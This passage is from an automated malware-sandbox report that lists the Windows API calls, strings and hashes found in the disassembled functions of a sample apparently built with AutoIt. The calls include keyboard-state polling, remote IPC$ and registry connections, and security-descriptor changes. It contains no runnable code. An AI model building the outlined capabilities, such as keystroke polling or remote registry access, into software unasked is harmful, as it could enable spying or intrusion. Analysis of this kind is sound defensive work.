                                          • Part of subcall function 00BF29E2: GetWindowLongW.USER32(?,000000EB), ref: 00BF29F3
                                        • DragQueryPoint.SHELL32(?,?), ref: 00C7CA4A
                                          • Part of subcall function 00C7AF24: ClientToScreen.USER32(?,?), ref: 00C7AF4D
                                          • Part of subcall function 00C7AF24: GetWindowRect.USER32(?,?), ref: 00C7AFC3
                                          • Part of subcall function 00C7AF24: PtInRect.USER32(?,?,00C7C437), ref: 00C7AFD3
                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00C7CAB3
                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00C7CABE
                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00C7CAE1
                                        • _wcscat.LIBCMT ref: 00C7CB11
                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00C7CB28
                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00C7CB41
                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00C7CB58
                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00C7CB7A
                                        • DragFinish.SHELL32(?), ref: 00C7CB81
                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00C7CC74
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                        • API String ID: 169749273-3440237614
                                        • Opcode ID: 6e63c2c6fc9e6cf3ea5621f6169f010026e1bf43db00f3935049b7699e2ebf0e
                                        • Instruction ID: 918d6e89823518c42013a3ccda4056cd1b819e423c20647241c60c13d634aa1d
                                        • Opcode Fuzzy Hash: 6e63c2c6fc9e6cf3ea5621f6169f010026e1bf43db00f3935049b7699e2ebf0e
                                        • Instruction Fuzzy Hash: 1C615971108301AFC711EF60DC85EAFBBE8EF89750F104A2DF695931A1DB719A49CB62
                                        APIs
                                        • #8.OLEAUT32(00000000,00000000,?,?,?,?,?,?,0000002A,00000000,00C80980), ref: 00C58187
                                        • #10.WSOCK32(00000000,?,?,?,?,?,?,0000002A,00000000,00C80980), ref: 00C58190
                                        • #9.WSOCK32(00000000,?,?,?,?,?,0000002A,00000000,00C80980), ref: 00C5819C
                                        • #185.OLEAUT32(?,?,?,?,0000002A,00000000,00C80980), ref: 00C5828A
                                        • __swprintf.LIBCMT ref: 00C582BA
                                        • #220.OLEAUT32(?,?,?,?,?,00000029,00000000,Default), ref: 00C582E6
                                        • #8.OLEAUT32(?,?,00000000,00000000), ref: 00C58397
                                        • #6.OLEAUT32(?,?), ref: 00C5842B
                                        • #9.WSOCK32(?), ref: 00C58485
                                        • #9.WSOCK32(?), ref: 00C58494
                                        • #8.OLEAUT32(00000000,00000000,?,00000000,00000000), ref: 00C584D2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: #185#220__swprintf
                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                        • API String ID: 2563594795-3931177956
                                        • Opcode ID: 3b5f36fb4b7ee2373589bb9f2328558a72ba1e008cdfd9a5fcdfd770fa7a44c6
                                        • Instruction ID: 84584cf34640f7ab24458007f0a615e9c8b4d73e95840951e18bb0f9821de7fb
                                        • Opcode Fuzzy Hash: 3b5f36fb4b7ee2373589bb9f2328558a72ba1e008cdfd9a5fcdfd770fa7a44c6
                                        • Instruction Fuzzy Hash: 8BD1EE39600916DBDB209F66C845B7EB7B4FF05742F248455EC14AB281CF34998DEBA8
                                        APIs
                                        • CharUpperBuffW.USER32(?,?), ref: 00C74829
                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C74874
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: BuffCharMessageSendUpper
                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                        • API String ID: 3974292440-4258414348
                                        • Opcode ID: 4b6aad96457cb89b749f4d58b8d187f49adeaed95fa45da3ef5a12a487486fdc
                                        • Instruction ID: 69ee9421c7fc40ef0a1dd8a9647c28811d1e39cea7bc27bfe9c976f4e879fb43
                                        • Opcode Fuzzy Hash: 4b6aad96457cb89b749f4d58b8d187f49adeaed95fa45da3ef5a12a487486fdc
                                        • Instruction Fuzzy Hash: C99182742006019FCB08EF10C451A7EB7E5BF95354F5489A8F9AA5B392CB70ED49DB82
                                        APIs
                                        • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00C5A12F
                                          • Part of subcall function 00C01A36: _memmove.LIBCMT ref: 00C01A77
                                        • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00C5A150
                                        • __swprintf.LIBCMT ref: 00C5A1A9
                                        • __swprintf.LIBCMT ref: 00C5A1C2
                                        • _wprintf.LIBCMT ref: 00C5A269
                                        • _wprintf.LIBCMT ref: 00C5A287
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: LoadString__swprintf_wprintf$_memmove
                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                        • API String ID: 311963372-3080491070
                                        • Opcode ID: 0a1d2bc6ede17052762d9b1aa9b79d9c4d354506048849a2dd4af9bcdc549bfa
                                        • Instruction ID: 899673dd31be44d91344bd30feb1a214ea9cbeea16d4bb96536a8fae1fd1dfcc
                                        • Opcode Fuzzy Hash: 0a1d2bc6ede17052762d9b1aa9b79d9c4d354506048849a2dd4af9bcdc549bfa
                                        • Instruction Fuzzy Hash: 8F518D7190011AAADF15EBE0CD42EEEB778EF14341F140265F905B20A2EB356F98EB61
                                        APIs
                                          • Part of subcall function 00BF4D37: __itow.LIBCMT ref: 00BF4D62
                                          • Part of subcall function 00BF4D37: __swprintf.LIBCMT ref: 00BF4DAC
                                        • CharLowerBuffW.USER32(?,?), ref: 00C5A87B
                                        • GetDriveTypeW.KERNEL32 ref: 00C5A8C8
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000, type cdaudio alias cd wait,?,open ), ref: 00C5A910
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000, wait,?,set cd door ), ref: 00C5A947
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000,close cd wait), ref: 00C5A975
                                          • Part of subcall function 00C01821: _memmove.LIBCMT ref: 00C0185B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                        • API String ID: 2698844021-4113822522
                                        • Opcode ID: 85b282804b0e516de2ea460ee04d11241fe1bb5ee2d9a86a8176e7251e82c68f
                                        • Instruction ID: 34251125f850e2f94c9d5a85f534ea92ad3d2bcde4d42406f60b50ccb073c3c3
                                        • Opcode Fuzzy Hash: 85b282804b0e516de2ea460ee04d11241fe1bb5ee2d9a86a8176e7251e82c68f
                                        • Instruction Fuzzy Hash: 39516F75104305AFC700EF21C89196BB7E4FF85758F14496CF89997291DB31EE09DB92
                                        APIs
                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C5A6BF
                                        • __swprintf.LIBCMT ref: 00C5A6E1
                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C5A71E
                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00C5A743
                                        • _memset.LIBCMT ref: 00C5A762
                                        • _wcsncpy.LIBCMT ref: 00C5A79E
                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00C5A7D3
                                        • CloseHandle.KERNEL32(00000000), ref: 00C5A7DE
                                        • RemoveDirectoryW.KERNEL32(?), ref: 00C5A7E7
                                        • CloseHandle.KERNEL32(00000000), ref: 00C5A7F1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                        • String ID: :$\$\??\%s
                                        • API String ID: 2733774712-3457252023
                                        • Opcode ID: c16f441214d1d3348743d247a172e4dfc7b9d0f4acd8c9db7c1211bef7b492d3
                                        • Instruction ID: 4124ca6767e906098d5c63c8a769d96cab53298bf2282854e255b6c1920726c1
                                        • Opcode Fuzzy Hash: c16f441214d1d3348743d247a172e4dfc7b9d0f4acd8c9db7c1211bef7b492d3
                                        • Instruction Fuzzy Hash: 6B31B27550020AABDB209FA1DC49FEF73BCEF89741F2041A6F919D2160E77097888B28
                                        APIs
                                          • Part of subcall function 00BF29E2: GetWindowLongW.USER32(?,000000EB), ref: 00BF29F3
                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00C7C61F
                                        • GetFocus.USER32 ref: 00C7C62F
                                        • GetDlgCtrlID.USER32(00000000), ref: 00C7C63A
                                        • _memset.LIBCMT ref: 00C7C765
                                        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00C7C790
                                        • GetMenuItemCount.USER32(?), ref: 00C7C7B0
                                        • GetMenuItemID.USER32(?,00000000), ref: 00C7C7C3
                                        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00C7C7F7
                                        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00C7C83F
                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C7C877
                                        • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00C7C8AC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                        • String ID: 0
                                        • API String ID: 1296962147-4108050209
                                        • Opcode ID: 4b7a7bedb2a91ccabdb0246daa1ed2cf60fccd38fa1f081b264785ad2cf95381
                                        • Instruction ID: 71ce4c72e29ec4b7cb4a400f7a957fd543502daa32ea2db540f9aa7e6f0a8c3e
                                        • Opcode Fuzzy Hash: 4b7a7bedb2a91ccabdb0246daa1ed2cf60fccd38fa1f081b264785ad2cf95381
                                        • Instruction Fuzzy Hash: 6C816C715083029FD714CF14C8C5AAEBBE8FB88314F14892EF9A997291D770D945DBA2
                                        APIs
                                          • Part of subcall function 00C48C03: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C48C1F
                                          • Part of subcall function 00C48C03: GetLastError.KERNEL32(?,00C486E3,?,?,?), ref: 00C48C29
                                          • Part of subcall function 00C48C03: GetProcessHeap.KERNEL32(00000008,?,?,00C486E3,?,?,?), ref: 00C48C38
                                          • Part of subcall function 00C48C03: HeapAlloc.KERNEL32(00000000,?,00C486E3,?,?,?), ref: 00C48C3F
                                          • Part of subcall function 00C48C03: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C48C56
                                          • Part of subcall function 00C48CA0: GetProcessHeap.KERNEL32(00000008,00C486F9,00000000,00000000,?,00C486F9,?), ref: 00C48CAC
                                          • Part of subcall function 00C48CA0: HeapAlloc.KERNEL32(00000000,?,00C486F9,?), ref: 00C48CB3
                                          • Part of subcall function 00C48CA0: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00C486F9,?), ref: 00C48CC4
                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C48911
                                        • _memset.LIBCMT ref: 00C48926
                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C48945
                                        • GetLengthSid.ADVAPI32(?), ref: 00C48956
                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00C48993
                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C489AF
                                        • GetLengthSid.ADVAPI32(?), ref: 00C489CC
                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00C489DB
                                        • HeapAlloc.KERNEL32(00000000), ref: 00C489E2
                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C48A03
                                        • CopySid.ADVAPI32(00000000), ref: 00C48A0A
                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C48A3B
                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C48A61
                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C48A75
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                        • String ID:
                                        • API String ID: 3996160137-0
                                        • Opcode ID: ae1115c6c59a813165a2973b19ef92c2a9c06d17d2f05127770551d7c2f8bea6
                                        • Instruction ID: eff17934d6c6f1303a67fb14bf573462990389052a1f759326af22a6e6ad0c88
                                        • Opcode Fuzzy Hash: ae1115c6c59a813165a2973b19ef92c2a9c06d17d2f05127770551d7c2f8bea6
                                        • Instruction Fuzzy Hash: 93614971900209AFDF01DFA5DC89FEEBB79FF04310F14812AF925A6290DB759A09DB64
                                        APIs
                                        • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00C5A341
                                          • Part of subcall function 00C01A36: _memmove.LIBCMT ref: 00C01A77
                                        • LoadStringW.USER32(?,?,00000FFF,?), ref: 00C5A363
                                        • __swprintf.LIBCMT ref: 00C5A3BC
                                        • __swprintf.LIBCMT ref: 00C5A3D5
                                        • _wprintf.LIBCMT ref: 00C5A48B
                                        • _wprintf.LIBCMT ref: 00C5A4A9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: LoadString__swprintf_wprintf$_memmove
                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                        • API String ID: 311963372-2391861430
                                        • Opcode ID: cd53727eb329dc4698d0c88073aac619c1e0c173e36a0fb712abf36a04f114e7
                                        • Instruction ID: 34abc0ddce7a9ab76680318cb242edcfba70f10356f36328b31309214f312286
                                        • Opcode Fuzzy Hash: cd53727eb329dc4698d0c88073aac619c1e0c173e36a0fb712abf36a04f114e7
                                        • Instruction Fuzzy Hash: E451B07190010ABADF15EBE0CD96EEEF778EF04341F144265F905A21A1EB316F98EB61
                                        APIs
                                          • Part of subcall function 00C01821: _memmove.LIBCMT ref: 00C0185B
                                        • _memset.LIBCMT ref: 00C4826C
                                        • WNetAddConnection2W.MPR(?,?,?,00000000,\IPC$,?), ref: 00C482A1
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C482BD
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00C482D9
                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00C48303
                                        • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00C4832B
                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C48336
                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C4833B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                        • API String ID: 1411258926-22481851
                                        • Opcode ID: 1b449328d8ed97fbd3da88932ad37d7417d8daa38fec203772ef64f5585c271a
                                        • Instruction ID: 0c1e6ff9bc95ee358ffb5e6540273717969bef2e4273bdbf8f69101db4cd48eb
                                        • Opcode Fuzzy Hash: 1b449328d8ed97fbd3da88932ad37d7417d8daa38fec203772ef64f5585c271a
                                        • Instruction Fuzzy Hash: FD41F472C1022DAFDB21EBA4DC95AEDB778FF04740F144129F911A21A1EB71AE08DB90
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: _wcscpy$#115#116_memmove_strcat
                                        • String ID: 0.0.0.0
                                        • API String ID: 1745391200-3771769585
                                        • Opcode ID: 72991a1d7371fd27f11f4741dee998e75ad5008bdb7faf17730e89e721edac76
                                        • Instruction ID: 8cf07aaca02c8e2538da5f19193442f63f92bf67657a60e972d3e808e9929482
                                        • Opcode Fuzzy Hash: 72991a1d7371fd27f11f4741dee998e75ad5008bdb7faf17730e89e721edac76
                                        • Instruction Fuzzy Hash: BD113A36904118ABDBA4ABB09C0AFDE77BCDF02715F1401A5F40597092EF70DAC9AB99
                                        APIs
                                        • GetKeyboardState.USER32(?), ref: 00C50702
                                        • SetKeyboardState.USER32(?), ref: 00C5076D
                                        • GetAsyncKeyState.USER32(000000A0), ref: 00C5078D
                                        • GetKeyState.USER32(000000A0), ref: 00C507A4
                                        • GetAsyncKeyState.USER32(000000A1), ref: 00C507D3
                                        • GetKeyState.USER32(000000A1), ref: 00C507E4
                                        • GetAsyncKeyState.USER32(00000011), ref: 00C50810
                                        • GetKeyState.USER32(00000011), ref: 00C5081E
                                        • GetAsyncKeyState.USER32(00000012), ref: 00C50847
                                        • GetKeyState.USER32(00000012), ref: 00C50855
                                        • GetAsyncKeyState.USER32(0000005B), ref: 00C5087E
                                        • GetKeyState.USER32(0000005B), ref: 00C5088C
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: State$Async$Keyboard
                                        • String ID:
                                        • API String ID: 541375521-0
                                        • Opcode ID: bcc1f5f855fa5b58727450185a03971795ff27ab240f31f6be9f0e94d803a39c
                                        • Instruction ID: 80b25175b041697626083917879e91e54eab6918db29ad7d31c173d40f198b41
                                        • Opcode Fuzzy Hash: bcc1f5f855fa5b58727450185a03971795ff27ab240f31f6be9f0e94d803a39c
                                        • Instruction Fuzzy Hash: BE51FC3890478829FB35E77088157ABBFB49F01341F18459D9DD2971C3DA64ABCCCBA9
                                        APIs
                                        • GetDlgItem.USER32(?,00000001), ref: 00C4CBFF
                                        • GetWindowRect.USER32(00000000,?), ref: 00C4CC11
                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00C4CC6F
                                        • GetDlgItem.USER32(?,00000002), ref: 00C4CC7A
                                        • GetWindowRect.USER32(00000000,?), ref: 00C4CC8C
                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00C4CCE0
                                        • GetDlgItem.USER32(?,000003E9), ref: 00C4CCEE
                                        • GetWindowRect.USER32(00000000,?), ref: 00C4CCFF
                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00C4CD42
                                        • GetDlgItem.USER32(?,000003EA), ref: 00C4CD50
                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00C4CD6D
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00C4CD7A
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
